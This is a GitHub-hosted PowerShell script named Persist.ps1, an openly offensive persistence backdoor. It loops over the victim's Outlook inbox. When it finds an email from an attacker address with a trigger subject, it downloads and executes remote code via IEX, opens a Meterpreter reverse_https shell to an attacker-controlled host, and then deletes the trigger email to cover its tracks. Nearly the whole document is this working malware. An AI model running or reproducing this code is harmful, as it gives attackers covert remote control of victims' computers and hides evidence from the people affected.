-
Notifications
You must be signed in to change notification settings - Fork 46
/
Persist.ps1
32 lines (24 loc) · 1.08 KB
/
Persist.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
$AttackerEmail = "[email protected]"
$TriggerWord = "EMAILSUBJECT"
While($True){
$olFolderInbox = 6
$outlook = new-object -com outlook.application;
$ns = $outlook.GetNameSpace("MAPI");
$inbox = $ns.GetDefaultFolder($olFolderInbox)
$Emails = $inbox.items
$Emails | foreach {
if($_.SenderEmailAddress -match $AttackerEmail -and $_.subject -match $TriggerWord)
{Start-Job -ScriptBlock {$WebClientObject = New-Object Net.WebClient
IEX $WebClientObject.DownloadString('PAYLOAD_URL')
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -LHOST xxx.xxx.xx.xxx -LPORT yyyy -Force}
}}
$Emails | foreach {
if($_.SenderEmailAddress -match $AttackerEmail -and $_.subject -match $TriggerWord)
{$OutlookFolders = $outlook.Session.Folders.Item(1).Folders
$EmailInFolderToDelete = $outlook.Session.Folders.Item(1).Folders.Item("Inbox").Items
$EmailToDelete = $EmailInFolderToDelete | Where-Object {$_.Subject -eq $TriggerWord -and $_.SenderEmailAddress -eq $AttackerEmail}
$EmailToDelete.Delete() }
}
#This determines how often the script checks in. Lower sleep time == more noise
Start-Sleep -s 10
}